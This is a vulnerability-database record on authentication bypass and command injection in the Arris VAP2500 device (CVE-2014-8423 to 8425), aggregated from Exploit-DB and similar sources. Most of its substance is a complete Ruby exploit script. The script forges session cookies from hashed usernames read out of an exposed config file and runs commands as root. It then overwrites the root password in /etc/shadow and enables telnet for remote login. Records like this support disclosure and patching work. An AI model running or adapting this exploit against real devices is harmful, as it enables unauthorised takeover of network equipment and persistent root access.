ID

VAR-E-201411-0043


CVE

cve_id:CVE-2014-8423

Trust: 3.0

cve_id:CVE-2014-8424

Trust: 1.5

cve_id:CVE-2014-8425

Trust: 1.0

sources: BID: 71299 // PACKETSTORM: 130064 // EXPLOIT-DB: 35372 // EDBNET: 22831 // EDBNET: 56567

EDB ID

35372


TITLE

Arris VAP2500 - Authentication Bypass - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 35372

DESCRIPTION

Arris VAP2500 - Authentication Bypass. CVE-2014-8425CVE-2014-8424CVE-2014-8423CVE-115046CVE-115045CVE-115042 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 35372

AFFECTED PRODUCTS

vendor:arrismodel:vap2500scope: - version: -

Trust: 1.6

vendor:arrismodel:vap2500 tools command.phpscope: - version: -

Trust: 0.5

sources: PACKETSTORM: 130064 // EXPLOIT-DB: 35372 // EDBNET: 56567

EXPLOIT

#!/usr/bin/env ruby

require 'net/http'
require 'digest/md5'

if !ARGV[0]
puts "Usage: #{$0} <vap2500_ip_address>"
exit(0)
end

host = ARGV[0]
new_pass = "h4x0r3d!"

http = Net::HTTP.new(host).start
users = nil
users = http.request_get("/admin.conf").body.split("\n").map! {|user| user.sub(/^(.*?),.*$/,"\\1")}

if users
puts "[*] found user accounts: #{users.inspect}"
puts "[*] checking for root privs"
else
puts "[!!!] could not find any user accounts. exiting."
exit(-1)
end

root_privs = nil
users.each {|user|
if http.request_post("/tools_command.php","cmb_header=&txt_command=whoami",{"Cookie" => "p=#{Digest::MD5.hexdigest(user)}"}).body =~ /root/
puts "[*] root privs found: #{user}"
root_privs = user
break
end
}

if !root_privs
puts "[!!!] could not find a root priv account. exiting."
exit(-1)
end

puts "[*] modifying root password"
new_hash = new_pass.crypt("$1$#{new_pass}$").gsub("$","\\$")
http.request_post("/tools_command.php","cmb_header=&txt_command=sed -i -r \"s/root:[^:]*:(.*)/root:#{new_hash}:\\1/g\" /etc/shadow",{"Cookie" => "p=#{Digest::MD5.hexdigest(root_privs)}"})

puts "[*] enabling telnet"
if http.request_post("/tools_command.php","cmb_header=&txt_command=rm /mnt/jffs2/telnet-disabled; sh /etc/init.d/S42inetd start",{"Cookie" => "p=#{Digest::MD5.hexdigest(root_privs)}"}).body =~ /Starting inetd/
puts "[*] success! telnet to #{host} (user:root pass:#{new_pass})"
else
puts "[!!!] couldn't start telnet"
end

Trust: 1.0

sources: EXPLOIT-DB: 35372

EXPLOIT LANGUAGE

rb

Trust: 0.6

sources: EXPLOIT-DB: 35372

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 35372

TYPE

Authentication Bypass

Trust: 1.6

sources: EXPLOIT-DB: 35372 // EDBNET: 56567

TAGS

tag:exploit

Trust: 0.5

tag:web

Trust: 0.5

tag:php

Trust: 0.5

sources: PACKETSTORM: 130064

CREDITS

HeadlessZeke

Trust: 0.6

sources: EXPLOIT-DB: 35372

EXTERNAL IDS

db:NVDid:CVE-2014-8423

Trust: 3.0

db:EXPLOIT-DBid:35372

Trust: 1.6

db:NVDid:CVE-2014-8424

Trust: 1.5

db:NVDid:CVE-2014-8425

Trust: 1.0

db:0DAYTODAYid:23173

Trust: 0.6

db:EDBNETid:22831

Trust: 0.6

db:EDBNETid:56567

Trust: 0.6

db:PACKETSTORMid:130064

Trust: 0.5

db:BIDid:71299

Trust: 0.3

sources: BID: 71299 // PACKETSTORM: 130064 // EXPLOIT-DB: 35372 // EDBNET: 22831 // EDBNET: 56567

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2014-8423

Trust: 2.7

url:https://nvd.nist.gov/vuln/detail/cve-2014-8424

Trust: 1.5

url:https://nvd.nist.gov/vuln/detail/cve-2014-8425

Trust: 1.0

url:https://0day.today/exploits/23173

Trust: 0.6

url:https://www.exploit-db.com/exploits/35372/

Trust: 0.6

sources: PACKETSTORM: 130064 // EXPLOIT-DB: 35372 // EDBNET: 22831 // EDBNET: 56567

SOURCES

db:BIDid:71299
db:PACKETSTORMid:130064
db:EXPLOIT-DBid:35372
db:EDBNETid:22831
db:EDBNETid:56567

LAST UPDATE DATE

2022-07-27T09:42:42.695000+00:00


SOURCES UPDATE DATE

db:BIDid:71299date:2014-12-03T00:55:00

SOURCES RELEASE DATE

db:BIDid:71299date:2014-11-25T00:00:00
db:PACKETSTORMid:130064date:2015-01-22T17:00:56
db:EXPLOIT-DBid:35372date:2014-11-25T00:00:00
db:EDBNETid:22831date:2015-01-22T00:00:00
db:EDBNETid:56567date:2014-11-25T00:00:00